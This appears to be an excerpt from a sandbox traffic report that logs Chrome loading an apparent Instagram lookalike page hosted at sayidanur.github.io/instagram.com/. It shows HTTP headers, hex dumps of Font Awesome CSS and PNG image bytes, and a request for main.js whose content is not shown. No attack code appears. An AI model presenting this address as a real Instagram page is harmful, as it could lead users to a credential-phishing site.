                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1369INData Raw: 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e
                                                                                                                                                                                                                                  Data Ascii: fa-animation-timing,cubic-bezier(.28,.84,.42,1));animation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1369INData Raw: 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74
                                                                                                                                                                                                                                  Data Ascii: tion-delay:var(--fa-animation-delay,0s);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animat
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1369INData Raw: 6e 2c 32 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61
                                                                                                                                                                                                                                  Data Ascii: n,2s);animation-duration:var(--fa-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-anima
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1369INData Raw: 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72
                                                                                                                                                                                                                                  Data Ascii: n-duration:0s}}@-webkit-keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transfor
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1369INData Raw: 61 74 65 59 28 30 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61
                                                                                                                                                                                                                                  Data Ascii: ateY(0)}to{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}}@keyframes fa-bounce{0%{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1369INData Raw: 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73
                                                                                                                                                                                                                                  Data Ascii: -webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:s
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC1369INData Raw: 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 7d 34 30 25 2c 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 68 61 6b 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25
                                                                                                                                                                                                                                  Data Ascii: it-transform:rotate(12deg);transform:rotate(12deg)}40%,to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes fa-shake{0%{-webkit-transform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  7192.168.2.649724185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC636OUTGET /instagram.com/img/googleplay-button.png HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 10071
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-2757"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: B5A6:56A91:1FA78B1:23A3592:66F8DD2E
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:02 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740030-EWR
                                                                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                                                                                  X-Timer: S1727585583.962922,VS0,VE29
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: a00ad6fa250fc3664d7632960553a97124c46881
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 34 00 00 00 a8 08 06 00 00 00 f7 b0 74 12 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e0 04 14 14 11 16 4c 49 4a c7 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 26 21 49 44 41 54 78 da ed 9d 0b 94 14 d5 99 c7 3b 71 54 04 24 83 82 12 45 19 04 71 78 c9 88 23 22 28 a2 88 02 22 21 e2 9a 75 25 c8 9a 95 43 30 0a 1b 44 d1 04 c4 cd 72 c0 28 ca 6b a3 49 60 f5 b8 89 21 bb 47 31 d1 18 4d 7c e0 fb 89 82 8a 3c e5 25 22 20 f2 1a 95 18 62 be ad 7f 33 35 29 8a ea aa 7b ab 6e 55
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR4tgAMAa cHRMz&u0`:pQ<pHYs.#.#x?vtIMELIJbKGD&!IDATx;qT$Eqx#"("!u%C0Dr(kI`!G1M|<%" b35){nU
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: a6 f2 55 fc 84 a6 58 c7 54 48 66 ea ea ea e4 a1 87 1e f2 14 14 e4 ad dc 72 cb 2d 79 b9 81 8c b8 a3 2d 7e 52 53 48 4a 11 19 d2 8d f0 50 68 08 a1 d0 84 8f ce 7c 7f 8a 34 7a 49 24 f7 82 ec 97 9a b7 16 78 ca 4c b3 d5 37 c8 91 ab 27 c8 91 6b 26 48 8b b5 37 4b af 4d 77 4b 8f 27 6e 92 23 da 1d cb 8b 20 63 3c fa e8 a3 07 45 5b 54 87 1f 00 3a 46 74 66 90 19 ec 2b ac 10 98 c2 1d 29 89 9a 93 62 e2 f8 e3 3c 26 c8 d1 67 9f 7d d6 b0 6f fc 7d fd fa f5 4a c9 b6 f6 30 23 f2 81 dc 32 5b 68 08 c9 d9 06 c8 9f 72 6e 10 37 0a 0d 21 14 9a 44 a8 fa d9 9f 24 f7 62 bd d0 d4 4b 4d e3 b7 17 14 94 99 a6 1f 58 ac 9d 20 4d d6 4d 90 e3 36 4e 96 be 5b e6 48 f5 ac ef 32 bf 26 23 20 fa e2 cc b9 40 67 88 a8 4b 98 99 2f 41 32 43 a1 31 7f 4c 5e e7 0f 82 a3 7b fe ae bd f6 da 83 a4 a6 d0 f9 74
                                                                                                                                                                                                                                  Data Ascii: UXTHfr-y-~RSHJPh|4zI$xL7'k&H7KMwK'n# c<E[T:Ftf+)b<&g}o}J0#2[hrn7!D$bKMX MM6N[H2&# @gK/A2C1L^{t
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: f2 6b ba fc 61 2c f3 6b 12 18 7a 72 3e 39 db 9d 15 a2 2c 48 ee 74 77 6e 18 4a 40 02 29 3a 42 67 65 58 5b 66 ae bd f6 5a a5 ce 50 75 e9 03 9d e5 0f ca 4d 68 70 6e bc 84 01 c7 87 22 79 38 7f 5e 11 b5 7b ee b9 27 ff 3b 4e 19 c2 86 73 ea 27 43 61 da c0 1d 49 a2 d0 10 42 a1 89 ce 5b 12 8b d4 e4 2c a9 31 29 33 4e 5a ec be 4d 7a d6 cd 65 7e 4d 8c a0 53 44 02 a7 3b 52 63 77 5a e8 8c 9c b5 66 f0 ff ee 8e 10 1b ea d4 14 92 99 28 85 f5 b0 41 0a 28 34 fe 52 e3 75 4e 20 9c ce f3 87 da 40 ee 29 d5 f6 86 61 c3 a0 c8 4e d8 36 70 d7 a6 a1 d0 10 42 a1 89 c6 db 12 9f d4 ac 8b 4f 6a 40 be 7e cd 96 bb 99 5f 13 23 78 6a df b3 67 4f 28 e1 40 e7 16 54 0b 85 42 13 8f d0 d8 52 83 e1 27 dd 6a ce 76 b2 2e 84 48 65 98 2a 6c 1b e0 f8 dc c7 46 a1 21 84 42 13 4d 68 4a 58 6a 90 38 8c fc
                                                                                                                                                                                                                                  Data Ascii: ka,kzr>9,HtwnJ@):BgeX[fZPuMhpn"y8^{';Ns'CaIB[,1)3NZMze~MSD;RcwZf(A(4RuN @)aN6pBOj@~_#xjgO(@TBR'jv.He*lF!BMhJXj8
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: 1f a9 41 12 6e 18 d9 b0 a7 5c eb 44 50 20 4e 10 1f d5 f7 cb ea d4 5c 42 a1 49 ab d0 60 f3 cb a9 a1 d0 50 68 8a 2f 34 19 96 9a bc cc 3c 5b 2f 33 69 12 9a d5 39 a9 5b 51 93 ea 9c 9a 30 c3 4c c8 6d 89 3a 13 09 ef 8b c8 8d 9f d8 50 66 28 34 14 9a e8 c2 80 ef 1a 1e 3c f0 bd d5 19 ea a5 d0 50 68 d2 f9 01 56 4b 66 a5 26 2f 33 cf 58 32 f3 54 2e 95 42 23 6b 2b 65 ec f7 d2 3b f4 a4 93 00 ac 3b 1b 22 4a 12 32 65 86 50 68 cc 0b 03 1e 44 54 1f 60 0a 7d 07 29 34 14 9a e2 0b 4d 06 a5 a6 41 66 fe 9c 4b af d0 ac c9 c9 4f 6f 49 e7 b0 13 a6 46 eb 44 65 e2 3c 16 dc 3c 29 33 84 42 93 8c 30 a8 44 6b 50 a7 86 42 43 a1 49 af d0 64 48 6a ee bf ee a7 b2 73 78 6f 91 47 2b 52 2f 34 93 ae 4b df 90 13 9e d4 4c 4f e7 34 91 98 4c 99 21 14 9a 64 84 41 25 52 e3 15 91 a5 d0 50 68 8a cb 1a
                                                                                                                                                                                                                                  Data Ascii: An\DP N\BI`Ph/4<[/3i9[Q0Lm:Pf(4<PhVKf&/3X2T.B#k+e;;"J2ePhDT`})4MAfKOoIFDe<<)3B0DkPBCIdHjsxoG+R/4KLO4L!dA%RPh
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: d4 3d 97 93 15 0f e5 64 e2 bf 96 66 9e 0c 85 26 5c 67 66 4f 09 b5 c1 53 97 6e de 85 8a 38 e8 de d8 ed d9 1c ce 63 c3 ff eb 7e 3e d5 44 4d dd bc 05 f7 b1 a9 14 6e 4c 42 68 74 8e c3 9e 25 06 99 c3 7b 22 82 81 ff 57 6d 63 d3 89 c2 2a f2 ac 13 c5 0c 73 2d fb e5 d3 85 b9 d6 74 44 ca 9e 32 0f 70 4e ec 6b 5e e7 7b e3 ce fd c1 3d 21 e8 f5 61 72 08 55 1e 00 d2 b8 c0 6f e9 0b 4d 0a a5 e6 17 63 67 c8 17 96 cc 80 a2 48 cd 33 15 0d 42 b3 f7 85 9c 6c 7e 3c 27 73 6f 2c dd 3c 99 72 14 1a af 9b 85 ea 90 89 d7 d4 62 af 4e 5e 75 5a a9 ca 92 11 aa fb 42 67 1a 74 23 44 c7 ab da 51 61 7f 41 c3 23 aa fb c2 67 f0 13 24 7b d6 56 b1 84 46 35 3f 04 e7 2b a8 8d f1 73 95 8e d4 64 3e 4d b1 b7 a0 21 d4 30 42 03 d9 57 19 f6 09 6a 47 d5 f3 e1 15 15 09 92 2a ec d7 74 32 70 5a 0b 95 66 43
                                                                                                                                                                                                                                  Data Ascii: =df&\gfOSn8c~>DMnLBht%{"Wmc*s-tD2pNk^{=!arUoMcgH3Bl~<'so,<rbN^uZBgt#DQaA#g${VF5?+sd>M!0BWjG*t2pZfC
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: 35 1b 6b ce 97 67 3b f6 94 7f 6b 79 02 65 c5 e0 d4 5e d3 09 b4 71 15 8a 73 de 6c 38 e4 14 cf 90 93 c9 1b 74 b1 87 9c 8a 95 e4 4b a1 d1 5b f2 03 6d 5f e8 33 e2 df f1 73 d5 29 f5 51 27 1d 38 ef 83 ba 09 f7 14 9a a4 84 26 26 a9 f9 2f 4b 66 76 d4 cb 4c 9c 52 f3 f1 69 fd e4 8d ce bd e5 47 c7 b7 97 6f 1c 72 28 45 25 a6 1a 31 c5 fa 72 86 ad a7 c2 a4 60 fd a4 e0 20 71 34 19 ad f3 6b b3 34 08 0d 8e 2f 0d c3 ad 59 13 1a 95 48 08 be ef ba 0f 51 78 9f a0 28 6e d4 72 02 ce 3c bd a0 e8 76 9a f2 0f cb 4f 68 0c 4b 4d 5e 66 4e bd c4 62 70 6c 52 f3 c9 69 17 ca d2 2e 7d 64 4e 9b ce cc 93 49 20 4a 53 ac 85 d5 54 a6 d0 7a e5 33 98 2a aa 56 8c 69 db a6 64 4b f7 29 52 45 b6 4c 5d 03 7e 6d 96 c4 b4 ed 42 1d 16 44 28 4d 25 ea b3 26 34 2a a2 19 f6 33 85 9d b6 ad f3 5d b6 8f 2d e8
                                                                                                                                                                                                                                  Data Ascii: 5kg;kye^qsl8tK[m_3s)Q'8&&/KfvLRiGor(E%1r` q4k4/YHQx(nr<vOhKM^fNbplRi.}dNI JSTz3*VidK)REL]~mBD(M%&4*3]-
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: 9f 38 ee 53 14 1a 55 3e 14 6d a9 99 79 fd 6c d9 0c 99 b1 d1 94 9a 75 9d 06 c9 8b 27 9f 27 b7 b5 ea cc 3c 99 0c 89 4d 1c d1 0e d5 d9 26 26 96 7b 30 71 fc b8 89 9a ac 9c 1c 76 06 47 12 9d 2c ce 7b 94 08 87 53 ae 8a 29 34 ba b3 c2 a2 cc c8 a1 d0 f4 0d bc de a3 e4 37 e1 b5 f6 35 1e 87 d0 a8 94 7e 28 c5 a9 da d9 12 1a 0d a9 99 79 1d 64 e6 db f5 e8 49 cd a6 ce 83 e5 f5 0e fd e4 9e d6 dd a5 53 a3 66 94 81 8c 61 d7 90 89 9a 70 89 8e 0e 9d 6f d2 eb e9 e0 f8 21 36 61 22 36 71 af c6 8c 9b 24 c4 46 37 62 83 b6 44 04 22 ce 9b 2c 3e b7 ce 39 b7 cf af 53 ae 74 e5 04 d2 88 7f 2f 44 d8 21 35 dd cf e2 3c c6 24 f2 26 fc 3e b3 69 99 2e e6 f1 e9 9e 07 7c 67 dd f7 0b 5c 03 7e c7 12 c7 70 6b 29 16 d2 cb a6 d0 28 48 0d 64 e6 a3 ea 6f e7 d1 91 9a cd 9d 86 c8 d2 53 2e 92 ff 6d 73
                                                                                                                                                                                                                                  Data Ascii: 8SU>mylu''<M&&{0qvG,{S)475~(ydISfapo!6a"6q$F7bD",>9St/D!5<$&>i.|g\~pk)(HdoS.ms
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC425INData Raw: 52 43 08 21 84 90 34 00 07 81 8b b8 d2 62 de 76 fb cb 41 42 83 a1 27 77 82 30 a5 86 10 42 08 21 c5 48 02 76 cb cc 8c 19 33 be 70 bb 8b a7 d0 80 e1 c3 87 7f c7 9d 4f 83 1d 32 a7 86 10 42 08 21 c5 c8 99 b1 65 06 81 17 65 a1 29 24 35 f6 ec 27 4e e9 26 84 10 42 48 5c 51 19 77 ad 19 80 d1 23 b8 49 21 6f 29 28 34 b6 d4 b8 87 9f 9c c5 f7 58 51 98 10 42 08 21 a6 12 7f 27 4d 9a 24 5e ce e1 17 99 51 12 1a 3b a7 c6 9d 28 ec 04 73 c2 21 37 58 a5 1b 82 03 18 c1 21 84 10 42 48 a1 24 5f db 17 e0 0e 18 f9 71 e7 c9 b8 13 80 83 64 46 49 68 9c 53 ba bd 86 a0 08 21 84 10 42 4c 83 11 22 f7 d4 6c 23 42 63 47 6b 50 51 b8 d0 30 14 21 84 10 42 48 54 91 41 10 45 c7 4f b4 85 c6 09 16 b4 c4 2a dd 94 1b 42 08 21 84 44 01 39 32 18 5a f2 4b fa 8d 4d 68 dc 91 1b 84 85 60 54 88 e0 10 42
                                                                                                                                                                                                                                  Data Ascii: RC!4bvAB'w0B!Hv3pO2B!ee)$5'N&BH\Qw#I!o)(4XQB!'M$^Q;(s!7X!BH$_qdFIhS!BL"l#BcGkPQ0!BHTAEO*B!D92ZKMh`TB


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  8192.168.2.649725185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC364OUTGET /instagram.com/main.js HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC766INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 3212
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  x-origin-cache: HIT
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-c8c"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: 2C5C:140E5B:2C4849A:318CE8C:66F8DD2D
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:03 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  Age: 1
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740038-EWR
                                                                                                                                                                                                                                  X-Cache: HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 1
                                                                                                                                                                                                                                  X-Timer: S1727585583.142935,VS0,VE1
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: a7bc998d695a55e7e3a04cbd889798be9b4e0f2d
